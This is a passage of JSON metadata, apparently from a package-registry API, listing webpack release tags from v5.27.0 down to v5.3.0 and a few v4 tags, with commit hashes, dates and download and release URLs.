repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/